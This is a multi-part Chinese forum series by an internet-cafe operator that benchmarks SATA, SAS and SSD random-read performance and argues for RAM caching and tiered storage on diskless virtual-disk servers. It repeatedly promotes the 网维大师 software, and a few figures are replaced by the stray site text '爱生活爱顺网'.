1)客户机上的硬盘很难将文件排列整齐,随着硬盘满了删,删了写,满了又删,长久以往,硬盘上的游戏难以按顺序排列,而且碎片很多,而网吧的环境又很难常常去整理硬盘,如果不幸用的是300G以上的硬盘,那整理的过程是会让人崩溃的.
2)就算是初次刻盘,将文件都好好的排好了,也不会是连续读取,因为基本没什么游戏会对硬盘的读取顺序进行优化,多数的游戏里面文件排列的规则都是按照开发人员易于管理的方式进行排列,比如素材这类的放在一起,地图这类的放在另一个文件夹里,人物的画面又放在其他文件夹里等等,这样的游戏在读取的时候,必然是地图要读,素材要读,界面要读,人物图片要读,这必然是”随机读取”的过程.
3)对硬盘来说,就算是读取连续文件,但是如果存在2个或者2个以上的读取线程,那就马上变成随机读取了,硬盘的磁头会不停的移动,一会去内圈为A进程读取,马上又去外圈为B进程读取.在XP开机刚进桌面的时候,因为进程很多,这时候磁盘速度会变的奇慢无比.
4)随机读取的衰减是非常惊人的,100%的顺序读取很罕见,多半都是部分是顺序的,部分是随机的,只要有少量的随机读取的比例,磁盘的性能就会急速的衰减.

说了这么多,很多朋友肯定还是不信,那么我们来看看真实的数据吧.

(图3-6:PCMARK测试intelSSD和希捷11代盘)

这个图是天极网做过的一个评测,用最爱生活爱顺网的机器(爱妻+爱生活爱顺网显卡),再超频到极限以后测试的结果,以尽可能好的机器来挖掘硬盘的潜力.
分别用INTEL的固态硬盘和希捷11代盘来测试PCMARK VANTAGE.显示的数值是2个硬盘在运行不同的测试项目时读取硬盘的平均速度.INTLE的固态硬盘是当今最快的固态硬盘之一,读取速度达到250MB/S,写入速度也能达到200MB/S以上,而且固态硬盘的特质就是随机性能和顺序读取性能相差无几.
仔细看看这个图,是很有启发的,我们来看Gameing这一项(第3行),在运行游戏项目的时候,固态硬盘读取的平均速度是95MB/S,而普通硬盘只有10.5MB/S.
在SSD的测试当中,硬盘不是系统的瓶颈,瓶颈是机器本身的处理性能,包括cpu和显卡,这说明这个系统的处理能力是95MB/S.
在SATA硬盘的测试当中,虽然系统能达到95MB/S的处理能力,但是硬盘只能输出10.5MB/S.这说明了,这个测试中,硬盘只能达到10.5MB/S的读取速度.
因为PCMARK VANTAGE只能在VISTA上运行,因此我们没有去复现这个测试,基于XP,我们用PCMARK05做了以下的对比测试:

(图3-7:PCMARK05测试OCZ的SSD)

这个图是上一节出现过的,采用网吧内普通的机器测试,这个OCZ的固态硬盘是去年夏天购买的,是OCZ第一代的SSD,采用JB的控制芯片.对比一下希捷硬盘的测试结果:

(图3-8:PCMARK05测试普通sata硬盘)

结果差异虽然不如天极测试的明显,但是结论是一致的.
测试中SSD硬盘在XP启动,游戏载入,普通应用这3项测试上能达到20-30MB/S的读取速度,这说明客户机的CPU和显卡的处理性能基本就在20-30mb/s这个水平上.
普通的sata硬盘在XP启动,游戏载入,普通应用这3项测试上只有7-8MB/S的读取速度.这说明,硬盘的读取能力仅有7-8mb/s的水平.

这就充分说明了:在游戏测试的项目中,硬盘去读取这些数据多数都是”随机读取”的状态,对固态硬盘来说,随机读取和顺序读取几乎是一样的,所以衰减很少,可以全速读取,但是对普通的硬盘来说,做随机读取需要消耗大量的寻道时间,实在是快不起来啊!
在图3-5的测试当中,硬盘需要花费95%以上的时间来进行寻道,只有5%的时间在读取数据.在各种不同的应用当中,表现的情况是随机读取的情况占大多数,在网吧中游戏是最主要的应用,普通的硬盘在游戏的表现中是非常不理想的.
因为随机读取性能更能代表硬盘本身的性能,所以我们在后面的测试大部分都是采用随机读取的测试结果.
总结:普通的7200转SATA硬盘,目前性能最好的已经达到了单碟500G容量.
用64K区块进行测试,这些硬盘顺序读取速度在外圈都超过100MB/S的速度,但是随即读取的速度一般只在3-4MB/S之间,而实际应用中,随机读取的速度决定了硬盘的快慢表现.
下一节,我为大家说说SAS和SSD硬盘,神秘的SAS和SSD硬盘对很多人来说就是昂贵和性能的代名词,究竟如何呢?下回分晓.

(未完待续)

第四篇:<揭开SAS和SSD硬盘的真相>
什么是sas硬盘:
SAS是新一代的SCSI技术，和现在流行的Serial ATA(SATA)硬盘相同，都是采用串行技术以获得更高的传输速度，并通过缩短连结线改善内部空间等。SAS是并行SCSI接口之后开发出的全新接口.
简单的说,sata是家用版本,sas就是服务器版本.
sas硬盘多半是采用2.5寸的盘片,sata一般是3.5寸的盘片(笔记本硬盘和迅猛龙硬盘除外).
Sas硬盘转速一般是1万转/分钟,或者是1.5万转/分钟,而sata的转速一般是7200转/分钟.
Sas硬盘的磁记录密度和sata差不多,所以连续读取速度上和sata硬盘差不多.但是sas硬盘的平均访问时间比sata快很多,所以在随机性能上有一定优势.
平均访问时间是由寻道时间和潜伏时间决定,而寻道时间由盘片大小和磁头臂移动时间有关,而潜伏时间和转速有关,综合起来,1.5万转的sas平均访问时间大概是是5-8ms,而sata一般是10-20ms.
下面我们通过测试来看看,1.5万转的SAS硬盘究竟有多快,

先看看顺序读取的情况:

(图4-1:HD TUNE测试希捷15000转SAS硬盘顺序读取)

使用的是希捷146G的15000转sas硬盘,在全顺序读取的情况下,最高速度为125M.这个速度和普通的希捷11代盘差不了多少.
再来看随机读取的情况:

(图4-2:HD TUNE测试希捷15000转SAS硬盘随机读取)

因为寻道时间的大幅度减少,随机性能比sata硬盘好了不少,但是也只有9.6MB/S,大概是sata硬盘2-3倍的速度.
这样,我们基本上就可以理解为sas硬盘的速度是sata硬盘的2-3倍,在实际应用的时候,我们确实发现sas硬盘对于无盘回写的处理能力,和2-3个sata硬盘的回写处理能力相当.在支持多回写的无盘软件上,用一个sas硬盘和3个sata硬盘所能得到的效果和带机量是相当的.

再来看看固态硬盘的情况:
基于闪存的固态硬盘,采用FLASH芯片作为存储介质，就是我们通常所说的SSD。
固态硬盘中，存储单元又分为两类：SLC（Single Layer Cell 单层单元）和MLC（Multi-Level Cell多层单元）。SLC的特点是成本高、容量小、但是速度快，而MLC的特点是容量大成本低，但是速度慢。MLC的每个单元是2bit的，相对SLC来说整整多了一倍。不过，由于每个MLC存储单元中存放的资料较多，结构相对复杂，出错的几率会增加，必须进行错误修正，这个动作导致其性能大幅落后于结构简单的SLC闪存。此外，SLC闪存的优点是复写次数高达100000次，比MLC闪存高10倍。此外，为了保证MLC的寿命，控制芯片都校验和智能磨损平衡技术算法，使得每个存储单元的写入次数可以平均分摊，达到100万小时故障间隔时间(MTBF),达到20年以上的使用年限.

固态硬盘的优点是寻道时间短,没有机械机构,耐冲击.缺点是价格高,容量小,写入速度一般.

固态硬盘这几年发展的相当快,每GB价格下降很快,几乎每年都要跌去一半的价格.现在INTEL80G的MLC硬盘大概售价在2爱生活爱顺网左右.INTEL30G的SLC硬盘大概也是2爱生活爱顺网左右.
固态硬盘的存储单元flash,本身速度并不是非常快的,象U盘一样,一般的读取速度也就几十M左右,但是因为flash访问延迟很低,因此固态硬盘的做法是就是将很多flash组成多个RAID0来提升速度,象INTEL提供的方案就是10通道的raid0,这样速度可以提升到200MB/S以上.
同样,我们用测试的数据说话,看看SSD到底有多快.测试对象是金士顿的32G固态硬盘,采用SLC芯片,是INTEL的OEM产品,性能和intel的硬盘几乎一样.

顺序读取:

(图4-3:HD TUNE测试金士顿32G固态硬盘顺序读取)

顺序读取速度稳定在210MB/S,平均的存取时间只有0.1秒.
再来看随机读取的情况:

(图7:HD TUNE测试金士顿32G固态硬盘随机读取)

同样的测试条件,金士顿的固态硬盘的随机读取的速度达到了惊人的128MB/S!平均读取时间为0.48MS,IO达到2061,这个性能是sata硬盘的30多倍,也是sas硬盘的10多倍.
结论:sata硬盘的性能远不如我们想象的那样,在实际应用当中,sata硬盘往往只有7-8MB/S的读取性能,而1.5万转的SAS硬盘确实比sata要快,性能大概能达到sata的2-3倍,而最快的硬盘式固态硬盘,能达到sata硬盘的30倍性能.
因此, 为虚拟盘服务器挑选硬盘时,如果仅从性能上考虑的话, SSD是最好的选择,sas硬盘次之.下一节,我们继续就硬盘的随机读取性能进行深入的分析.
(未完待续)

第五篇:<随机读取性能分析>
在第三篇的时候,我讲到了一个观点,就是在应用中多数的情况都是有部分数据是随机读取的,部分数据是连续读取的,我还讲到,少量的随机读取的比例就会导致硬盘的性能大幅度的降低,现在我们来看看随机数据的比例对硬盘的确切影响.
我们使用IOMETER来进行这项测试.IOMETER是专业的磁盘测试工具,因为可以灵活的设定测试的详细条件,因此在很多专业评测中采用.大家有兴趣的话也可以研究研究.
先看看sata硬盘的测试情况.测试对象是一个西数的80G SATA硬盘.

(图5-1:IO Meter测试西数80G硬盘读取,0%随机)

第一图是全顺序读取的结果,这个硬盘连续读取的能力为55MB/S.IOps是877.测试区块仍是64K.

(图5-2:IO Meter测试西数80G硬盘读取,5%随机)

仅仅是加入了5%的随机数据,性能已经衰减到20MB/S,iops降低到474
后面的测试图我就不一一张贴了,整理成下图



接下来看看SAS 硬盘的情况
全顺序读取:

(图7:IOmeter测试希捷15000转sas硬盘顺序读取)

25%的随机数据读取:

(图7:IOmeter测试希捷15000转sas硬盘25%随机读取)

50%的随机数据读取:

(图7:IOmeter测试希捷15000转sas硬盘50%随机读取)

100%的随机数据读取:

(图7:IOmeter测试希捷15000转sas硬盘100%随机读取)

整理成图表:

综上,只要有少量的随机数据,硬盘的性能就会急剧的下降,sata和sas硬盘都不例外.
在来看看对固态硬盘来说,随机数据的影响.
讲完了硬盘,下一节,我们来看看虚拟盘的性能.
(未完待续)

第六篇:<虚拟盘的性能分析>
虚拟盘:
虚拟盘是一种虚拟的网络存储空间，它是通过网络来管理和使用的远程硬盘空间，可用于传输、存储、下载和备份计算机数据文件，聊天软件绑定的网络硬盘与传统的存储方式相比较，具有管理和使用方便的特点。
虚拟盘工作过程:
客户机发出读取需求=》指令通过网络传输到服务器=》服务器去读取数据=》通过网络将数据发送给客户机,整个环节中,最有可能造成延迟的部分就是后2个环节.
服务器读取数据的环节,一般是服务器先在缓存中寻找,如果缓存中没有,则到相应的硬盘中去读取.缓存命中的数据,其延迟是微乎其微的,所以主要延迟还是硬盘的延迟.
通过网络将数据发送给客户机这个环节,还要经历软件处理=》网卡=》网线=》交换机=》网线=》客户机网卡=》客户机,这么多的过程中,虚拟盘软件的传输协议,网卡的性能,交换机的性能,网线的性能都会影响到最终的虚拟盘性能.
总结起来,影响虚拟盘性能的主要因素就是:硬盘性能,软件性能,网络性能.下面逐个来分析一下.
首先来说说网络,典型的千兆网络,使用超5类网线传输,经过我们测试,其实延迟是非常之低的,看看这个测试图:

(图8:交换机性能测试)

这个测试表明,在64字节这样的极限条件下,2个交换机的通过率都超过99%以上,请注意测试单位是64字节,而不是64kb,普通硬盘如果用512字节来测试的话,连续数据也只有3-4MB/S,随机数据就只有几十KB/S了.交换机上单个包的延迟仅为4微秒,比硬盘的15毫秒的寻道时间少了3000倍.尽管网吧里的状况不可能象实验室中的测试条件那么好,但是实际上,网络上真正的延迟还是远比硬盘的延迟要低的多的多!

我们再来看看虚拟盘软件
在客户机用HDTUNE测试网维大师5.0版本虚拟盘的速度.我们将数据全部缓存在内存当中,以屏蔽硬盘对虚拟盘速度的影响,按64K的条件来测试,结果如下:

(图9:虚拟盘在缓存命中情况下随机读速度(客户机测试))

测试方法是随机读取,在64K的条件下,速度约55MB/S左右,很好理解,服务器每次按64KB大小进行发包,1秒钟要达到55MB的流量,需要发880个包(普通硬盘每秒只能处理60个64K的数据),因而我们可以计算出虚拟盘软件+网络最终造成的延迟:64KB/55MB*1024=每个64K包的延迟=1.1毫秒
由此可见,软件性能和网络性能导致的延迟相加不过是1.1毫秒而已,远比普通硬盘的10毫秒-20毫秒的延迟小的多.所以:真正要提高虚拟盘的性能,关键还是在于硬盘,硬盘才是整个环节中的最大瓶颈.
我们加上硬盘的影响,做个直接的对比测试吧:

(图10:虚拟盘在有缓存和无缓存情况下随机读速度(客户机测试))

蓝色的是完全没有内存缓存的情况,所有的数据都是直接从硬盘中读取.在同样的测试条件下,同样的虚拟盘,缓存命中和缓存未命中带来的差异是惊人的.除了固态硬盘,其他2个硬盘的测试结果都非常的糟糕.希捷7200.11虚拟盘速度只有缓存命中情况下的1/10,超过90%的时间都损耗在硬盘的寻道时间上了.

分析到这里,要获得好的虚拟盘性能,对应的方法就很简单了:
1、尽可能的减少硬盘的读取,用内存对常用数据进行缓存.
2、尽可能提高服务器硬盘的性能,比如使用SSD硬盘
3、使用好的虚拟盘软件
4、网络性能不能太差
OK.下一节我们开始讲该怎么做.
(未完待续)

第七篇:<虚拟盘的负载能力:上篇>
回答一些朋友的问题
22楼的朋友说: 为了更好的利用客户机硬盘空间，我等还是采用本地加虚拟盘这种方式为客户提供游戏服务。
我的回答:如果你喜欢游戏运行的慢一点,如果你喜欢让顾客等着游戏更新,如果你喜欢那些麻烦事情,我是不会拦着你的,只要你喜欢,你安心,我没有意见的.

42楼的朋友说:楼主洋洋洒洒一大篇理论，感觉都是纸上谈兵而已。就像无凭无据，做什么说什么都是拼自己脑袋瓜想出来的.
我的回答:我的理论我都实践过,从07年下半年开始,我就在自己的网吧里使用这样的方案,那时候的虚拟盘软件没有一个能符合我的需求,于是我尝试了很多种软件,最终在我组合了3种虚拟盘软件,加上SUPERCACHE,做出了一个无比复杂的庞大体系,虽然最终效果很好,但是过于复杂的体系导致完全不能推广,直到今天,我能将方案简化到人人都能看懂的时候,才能拿出这篇文章.
为了能把这个问题说的更加简单明了,我从初稿开始,到现在一共修改了12次,测试那些数据,至少花费了近2个月的时间.如果这样纸上谈兵的话,只能说我的能力实在太差了,您实在是对我期望太高了点.

43楼的朋友说:….
我的回答:同上

44楼的朋友说:你SA不SA啦，人家在顺网论坛发，这篇文章一看就知道是为顺网的虚拟盘写的，我觉得下几篇肯定就是为网维大师漂白的.
我的回答:这种方法是可以用在任何虚拟盘软件上得到,虽然我拿网维大师的虚拟盘举例,但是你完全可以用别的软件.需要理解的是思路和方法,懂得方法,用别的软件也可以达到同样的效果.网维大师的虚拟盘是完全免费的东西,用或者不用,只是你自己的选择.

50楼的朋友说: …………….(太长了,我不引用了)
我的回答:你的方法,我只能说,像是做梦一样.你最后一句话,让我被雷到了…这样奢侈疯狂的投资,居然只是和本地硬盘差不多?大哥,你看了我的文章了吗?你知道本地硬盘有多慢吗?

60楼的朋友问:IOPS是什么
我的回答:IOPS意思就是指每秒硬盘所能完成的IO次数,就是读取或者写入的次数,这个数值随着测试条件不同,会有很大的差别,我按照单线程,64k的条件来测试.一般的专业测试是32线程,512字节的条件来测试.IOPS可以用IOMETER这个软件来测试.

64楼的朋友问:那么硬盘到底用多少字节的好呢？
我的回答:格式化的时候字节越小越省空间,字节越大,出盘越快.参考值:500G用8K,1T用16K,1.5T用32K.

72楼的朋友说:请推荐个150台电脑的虚拟盘配置和做法~！
我的回答:我在文章最后会给大家一些具体的配置参考,但是只是照单抓药是没有用的,每个人的具体情况不同,正确的方法应该是理解方案的思想和精神,自己根据实际情况进行灵活的组合.

83楼的朋友说:讲了这么多，还没讲到重点了。。以上讲的就是随机读取是很重要的，普通硬盘随便性能是很差的。。阵列是没有用的，SSD才是牛B的。
我的回答: 请允许我表达对您的敬意,我洋洋洒洒写了万余字,您用乐5句话,40个字,就能说的明明白白,清清楚楚,由衷的佩服啊!

86楼的朋友说:这个方案感觉不怎么对劲
我的回答:希望您能告诉我哪里不对劲,我赶紧再改改.

以上,希望朋友们能踊跃提问,我当尽力解答,本人工作繁忙,如不能及时回复,还请谅解.
以下,继续上一篇的话题,补充一张测试截图.

虚拟盘的速度实测
由上一节，我们得到一些基本的结论，在虚拟盘读取的所有环节里，硬盘是速度上的最大瓶颈,所有其他的因素,包括网卡,网线,交换机,软件性能,操作系统平台等等,它们加起来所造成的延迟不到硬盘的1/10,所以,要提高虚拟盘最终读取速度的关键就在于硬盘.
我们来看一个典型的测试,在客户机上,用HDTUNE对虚拟盘进行随机读取测试.我们用内存进行读取数据的缓存,这样测试到的数据全部是从服务器中的缓存发出的,结果如下:

结果可以清晰的看到,在64K区块测试的时候,延迟1.2毫秒,是sata硬盘的1/10,同时流量也达到了53.6MB/S,这个速度是普通的SATA硬盘绝对无法望其项背的.是SATA硬盘的10多倍,是SAS硬盘的5倍,已经非常接近于固态硬盘的读取速度了.

虚拟盘有多少的负载能力呢?
要回答这个问题,我们先讲几个概念,如果不能明白这几个概念,那就难以理解整个体系的奥秘所在.

基本名词解释
什么是缓存?
   在网维大师的虚拟盘中,会将部分物理内存用于存储最常被读取的数据（类似SUPER CACHE的MFU算法）,当客户机请求读取数据时,服务器会先在这些内存中进行寻找,如果在内存中有这些数据,则直接由内存发出,只有内存中没有该数据,才会去硬盘中读取.

什么是缓存命中率?
  是指所有服务器发出的数据当中,有多少比例的数据是从内存中发出的,越高意味着性能越好. 比如50%的命中率意味着,每从服务器发出100M数据,其中50M是从内存中发出的,只有50M是从硬盘中发出的,这就意味着与不使用缓存的服务器而言,我们服务器的负载能力扩大了2倍.

如何提高缓存命中率?
要想得到一个较高的缓存命中率，首先得有一个好的缓存算法，有了好的缓存算法能很大的提高命中率。其次，就是装上尽可能多的内存。

网吧中的真实负载情况
要想明白一个虚拟盘服务器到底能带多少机器,首先得知道负荷会有多大,在一个典型的中型网吧里,装了1.8T的游戏,究竟在营业的时候,会读取多少的数据呢?这是很关键的问题,不知道朋友们是否认真的研究过这个问题,但是至少我在做这个测试之前,我还真的不知道这个准确的数字.

好吧,我们来看看这个测试,这个测试网吧是个典型的中型网吧,机器110台,来的客户有学生,有民工,还有些上班族,生意一般,不好也不差.我们将所有的游戏均部署在虚拟盘上,统计了2天的数据. 注意:是所有1.8T的游戏,在客户机的本地硬盘上,一个游戏都不装!

2天内所有的游戏读取数据量为448G.
根据收费系统的统计,2天内所有的客户机在线机时总共为1730小时.
这样计算下来每秒每客户机的流量为: 448G/(1730小时*3600秒)= 75K/S
后来我们也测试了一些其他的网吧,虽然不同的网吧,不同的玩家行为会造成一些差异,但是大体上结果是相似的.

传统的虚拟盘的负载能力
根据上述的一个网吧用户平均读取流量,我们就可以评估一下,传统的虚拟盘的负载能力.
我们考虑一个简单的模型,假设这个传统的虚拟盘服务器,只有一个希捷7200.11硬盘,同时没有任何缓存机制,这种情况下,我们简单的算一下,这个服务器能带起多少机器.
对这样一台服务器来说,因为硬盘的随机读取的能力仅为4MB/S, 网络和其他因素应该可以轻松的达到4MB/S的能力,因此我们完全可以认为该服务器的性能瓶颈集中在硬盘上.
按照4MB/S的硬盘能力,我们计算硬盘的极限承受能力:
4M(硬盘随机性能)/75K=54台.
意思就是说,按照75KB/S的平均读取需求,该服务器的硬盘最多能承受54台机器在线.
实际上,为了应付突发的情况,我们应该为服务器留点余量,不能让服务器总是工作在满负荷情况下,假设按3倍的余量计算:54/3=18台.
结论:这样的虚拟盘服务器,在18台机器的负载情况下,大部分的时候,性能和本地硬盘相当.这样的结论和我们经验值是比较接近的.在实际网吧应用当中,我们是不敢将所有游戏都部署在这台机器上,这点负载能力,太不够用了,那么,怎么办呢?

89楼的朋友在看到第六篇的时候,已经给出结论了,要提高虚拟盘的性能,出路就2个: 一个是用固态硬盘，二是用高内存做缓存,但是这两种办法都是非常昂贵的手段,网吧花的起这个钱吗?
我的办法就在下一篇: 第八篇:<虚拟盘的负载能力:下>
未完待续

第八篇:<虚拟盘的负载能力:下>
神奇的2/8原则
首先,我来解释一下什么2/8原则.
二八原则是19世纪末20世纪初意大利经济学家帕累托提出的，这个原则很简单：
任何一组事物中，最重要的只占其中约20%，其余的80%虽然是多数，但是却是次要的。
比如:
　　80%的销售额是源自20%的顾客；
　　80%的电话是来自20%的朋友；
　　80%的总产量来自20%的产品；
　　80%的财富集中在20%的人手中；
非常简单的一个原则,但是现实生活中,你会发现这样的规则几乎是无所不在的.
基于2/8原则,在虚拟盘的应用上,我们可以引申出内容分级存储管理的概念.

什么是内容分级存储?
是指我们将所有可以用来存储内容的介质,按照性能的不同,分成多个级别,在进行存储的时候进行优化选择,将最常用的数据存储在性能最高的介质中,依次类推,将最少用到的数据存储在最廉价的介质上,实现速度和容量并重,同时造价尽可能的低廉.
根据2/8原则.80%的顾客只玩20%的游戏,那么我们只要把这20%的游戏搞的很快,就能满足80%的顾客需求.这点,可以根据网维大师上的DP值排行就看的出来.
再根据2/8原则,大部分的游戏,在80%的运行时间里,往往只读取其中20%的数据.这一点有根据吗?有,好好的观察一下,我们会得到这么一个结果:
魔兽世界这个游戏虽然有10来个G,但是进一次游戏,从启动图标开始一直到游戏画面中,需要读取多少数据呢?
答案是:只要200M!在游戏里玩上1-2个小时,总共读取的数据也就500M而已!
XP装完要至少1.5G,但是启动一个XP到桌面,需要读取多少数据呢?
答案是:只要250M!

同样的例子还有很多,我们对市面上几个常见的游戏均进行了测试,结果如下:

永恒之塔 500MB
穿越火线 600MB
QQ飞车 95 MB
反恐OL 240 MB
QQ炫舞 200 MB
QQ三国 100 MB
天龙八部 130 MB
魔兽争霸3 100 MB
梦幻西游 30 MB
诛仙 100 MB
QQ寻仙 470 MB
传奇 50 MB
魔兽世界 200M

除了穿越火线,QQ寻仙等几个腾讯出的BT游戏之外,大部分游戏需要读取的数据都非常的小.在实际游戏过程中也是一样的,除了切换地图,绝大多数的时间,游戏基本都不读什么数据的.
结论就是,尽管游戏容量非常之大,但是其中经常会用到的数据其实非常非常少.
根据上述分析,我们的答案就很简单了.
目前的常见介质的特性如下表所示:

(图1)
内存是性能最好的存储介质,那么我们就应该将最常被读取的数据放在内存里.
其次固态硬盘也是非常好的介质,那么我们就应该将最热门的游戏放在固态硬盘里.
…………………………………
最后,SATA硬盘容量又大又便宜,那么我们就把那些最冷门的游戏放在SATA里.

内容分级存储的典型应用

来看看上次网吧流量测试当中的服务器截图.

这就是非常典型的内容分级存储的案例.
服务器内存共8G,我们拿出了7G内存用作虚拟盘缓存,游戏放在3个硬盘上,G盘为120G的固态硬盘,H盘和I盘是普通的希捷11代的1T硬盘,安装游戏一共1.8T左右.
根据上面这个图,我们看到了什么结果呢?
1)7G的内存,产生了平均74%的缓存命中率.就是说,虚拟盘74%的负荷被内存解决了.
2)放在固态硬盘上的100G游戏,被读取的数据量为86616M,这个数据量是所有硬盘读取数据量的86/(86+22+9)=73.4%
3)H盘和I盘,2个硬盘读取的数据总量相加,只负载了整个虚拟盘负荷的7.1%
结论:在这个服务器上,我们成功的利用了2/8原则,以7G内存和100G固态硬盘的代价,解决了虚拟盘服务器中93%的负载.这93%的数据,有着比本地硬盘快的多的速度,剩下那7%的数据,也拥有和本地硬盘相近的速度. 这就是分级存储的惊人效率!

这个案例非常完美的解决了虚拟盘的速度问题,那么负载能力会成问题吗?

内容分级存储服务器的负载能力

这么一台典型的,采用了分级存储的服务器,能负载多少的机器?
还是采用上面的分析方法,先找服务器瓶颈.
服务器的瓶颈有可能存在这些方面:
1.CPU
2.网络(包括交换机,网卡,网线等)
3.软件(虚拟盘软件,WINDOWS操作系统本身)
4.各个硬盘

仔细分析一下:
1.CPU:以酷睿5200这样CPU来说, 在绝大多数时候,CPU占用不超过10%,所以CPU不会成为瓶颈.
2.网络:前几篇的分析结果至少说明,单个网卡输出50MB/S是没有任何问题的,那么如果流量不超过50M,网卡也不会是瓶颈.如果超过50M,我们还可以通过多网卡绑定,汇聚,分流等方式来解决.事实上我们测试网维大师的虚拟盘服务器上网卡是可以输出90MB/S以上的.所以,网络也不会是瓶颈.
3.软件:网维大师在WIN2003上可以输出200MB/S以上的速度(多网卡情况下),同时,网维大师的新虚拟盘可以同时负载上千个连接,所以这个也不是瓶颈.
4.硬盘:固态硬盘的负载量是SATA硬盘的爱生活爱顺网倍,按照SATA硬盘4MB/S的性能,那么固态硬盘性能只要超过4*爱生活爱顺网=30MB/S,那么固态硬盘就不会是瓶颈.根据前几节的测试,固态硬盘的随机读取能力可以达到100MB/S以上,所以SATA硬盘还是瓶颈.

结论:如果网络没有大问题,如果我用多个网卡分载,那么这个虚拟盘的瓶颈仍然是SATA硬盘,如果客户机不断的增加,在其他部分出问题之前,SATA硬盘已经顶不住了.那么我们就只要计算一下,SATA硬盘在这个案例中的极限负荷能力就行了.

还记得上一篇中,我们计算的传统虚拟盘的负荷能力吧?
单硬盘的负荷能力为18台机器.
这个服务器有2个SATA硬盘,,那么就能负荷36台.
这2个硬盘负荷的数据量为总数据量的7%,那么该服务器的负荷能力为36/0.07=517台!
就是说,当客户机达到517台时,2个SATA硬盘的负荷能力达到极限.
这还是留了3倍性能余量的结果!
就算是真的达到517台客户机,Sata硬盘到达阀值,受影响的也仅仅是7%的数据,另外93%的数据仍然流畅无比!
这,是真的吗?
如果你仍有怀疑,那我们反过来再算一次.看看517台客户机的时候,工作情况是怎样的.
每用户平均流量为75KB/S
那么500台客户机在线时,总平均流量为75*517=38.4MB/S
我们留出三倍余量,突发速度就是38.4*3=115MB/S
那么我们用两张网卡分流就完全可以应付!
这115MB/S的流量,内存缓存掉74%,还剩下:115*26%=29.9MB/S
这29.9MB/S的流量,固态硬盘分掉73%,还剩下:29.9*27%=8.07MB/S
这8.07MB/S的流量,2个SATA硬盘平分流量,刚好是SATA硬盘的极限.

现在,我的朋友,您还有怀疑吗?
那么,我再安全一点,考虑到用户太多以后造成的突发情况可能会更大,那我不留3倍余量了,我留5倍的余量,让这台服务器去带300台机器.
就这样,只带300台,您放心了吗?您敢带吗?
我敢!我在5月份的时候,在我自己的网吧里,就用这么一台机器带了275台客户机跑所有的游戏!很流畅,很舒服,很安心! 一直到8月底,现在,我有了更好的方案.才把这台服务器换了下来.

这一篇的最后,我们来算个帐,这么一台可以稳定的带300台机器的虚拟盘服务器,装了1.8T的海量的游戏,还能让你的顾客在93%的时间里,都能感受到本地硬盘还要快的速度,这个机器要多少钱呢?

主板:intel3000 (1200左右)
Cpu:酷睿5200 (420左右)
内存:DDR II 2G*4 共8G (600左右)
硬盘:OCZ 120G固态硬盘*1 (2000左右)
希捷7200.11硬盘1T*2 (1400左右)
机箱,电源等 (500左右)
-----------------------------------------
总计:6120元

一些结论和建议
1.在我们的方案中,内存是最最最最最最值得去投资的部分,想要虚拟盘性能好,无论如何请尽可能的加大服务器的内存数量,4G是最起码的,一般达到8G才会开始产生质的飞跃.如果你的老板真的很穷,穷到连8G内存都买不起的话,请告诉他,把服务器机箱卖了吧,宁可让服务器裸奔,也要加满内存!
2.不要迷信SAS硬盘,把买SAS硬盘的钱换成内存吧!1个300G的SAS硬盘要1500块,把它换成10G内存,效果会好10倍!
3.网维大师的虚拟盘程序足够稳定,区区500台机器搞不垮虚拟盘.
4.除了最热门的100G游戏,其他2T的游戏只要用SATA硬盘就足够了,看见有人用SAS300G硬盘*6的方案,我的心在滴血,为网吧老板滴血!
5.缓存命中率决定了虚拟盘的速度以及负载能力. 是虚拟盘中最有价值的指标. 命中率取决于算法和内存大小,基于网维大师及其优秀的缓存算法,剩下唯一要做的,还是那件事情:不顾一切的增加服务器的内存吧!
6.一般建议使用内存+小容量固态硬盘+大容量SATA硬盘这样的组合方式.大家也可以根据自己的喜好来自由搭配.内存和固态硬盘的效果是非常好的,但是既昂贵,容量也有限,我们不可能把所有的游戏数据都放在里面,我们要做的,就是要把最常用的数据放在内存中,次常用的放在固态硬盘里,不常用的数据放在SATA硬盘里.这就是所谓的分级存储管理.

这一篇的最后,我提一个问题吧.
这样的方案已经是最好的方案了吗?
我的答案是:NO!
下一篇,我来讲讲另一种更有意思的方案.
未完待续

第九篇:<终极的虚拟盘方案>
因为前段时间本人的硬盘坏了,结果辛苦积累很久的数据和文章一起报销,文章可以重新写,但是收集那些数据确实太过麻烦了.下了很久的决心,终于决定重新开始写吧,因此续文这次拖了这么久,内心非常的愧疚.闲话少说,就开始正文吧.

在前几篇文章中,我们已经将虚拟盘中的几大因素都做了一些剖析,我们提出了分级存储管理的方法,用来更有效的提高虚拟盘的效能,以及有效的控制成本.
内容分级管理中最重要的因素是内存,常见的服务器多数只支持到8G左右,在8G内存情况下,缓存的命中率一般都在70%-80%左右,我们也知道,如果命中率越高,那么虚拟盘的效能和负载能力也就越高,那么,如果增大内存,最终我们会得到什么效果呢?
理论上,愈大的内存,缓存命中率就会越高,但是命中率和内存大小并非是线性的关系,当内存大到一定程度以后,就渐渐的失去了性价比. 那么,多少的内存数量是合适的呢?

为了得到答案,我采购了一台拥有64G内存的服务器.先介绍一下这个服务器.服务器主板是泰安的S5397,拥有16个内存插槽.CPU是志强E5405.

服务器安装了16根4G一条的FBD内存,看以下截图:

志强E5405的CPU,64G内存,win2003 sp2(32位)版本

Everest中,可以清楚的可以看到16条FBD内存,我们选取了其中8条来监控内存温度,显示在系统的右下角,温度一直在60-70度之间.对这个服务器来说,内存散热是非常关键的问题,在室温下,这堆内存能在3分钟之内迅速达到90度以上的高温,这是非常恐怖的,最后我们找到了2个12寸的暴力风扇直接对准内存猛吹,才最终将温度降到70度左右.

在网维大师虚拟盘服务端上设置了60G的内存缓冲,系统还剩余4642M内存.服务器上只安装了一个游戏盘,容量为1.5T的希捷11代盘.把游戏拷满.
我们来猜一下,这样命中率能到达多少?
(说明:这组数据我不太满意,因为第一天的时候做了大量的虚拟盘测试,从而多读了很多的硬盘数据,在后来的测试中,命中率比这个高很多,但是后来积累的数据遗失了,我们以此为例,道理是一样的.)
第一天:

发送数据150G,硬盘读取数据15G,因为缓存设置了60G,所以这15G数据全部被缓存.但是命中率只有89%,因为:不管内存多大,第一次读取总要从硬盘读吧!

第四天:

第四天:发送数据494G,硬盘读取数据26G,没有超过60G,所以这26G数据全部被缓存.命中率提高到94%.

第六天

第六天:发送数据800G,硬盘读取数据33G, 没有超过60G,所以这33G数据全部被缓存.命中率提高到95%.

第十天:

第十天:发送数据1387G,硬盘读取数据45G, 仍然没有超过60G,所以这45G数据全部被缓存.命中率提高到96%.
我们用HDTUNE来观察硬盘的运行情况,如下图所示,硬盘在多数时候都是完全空闲的状态.

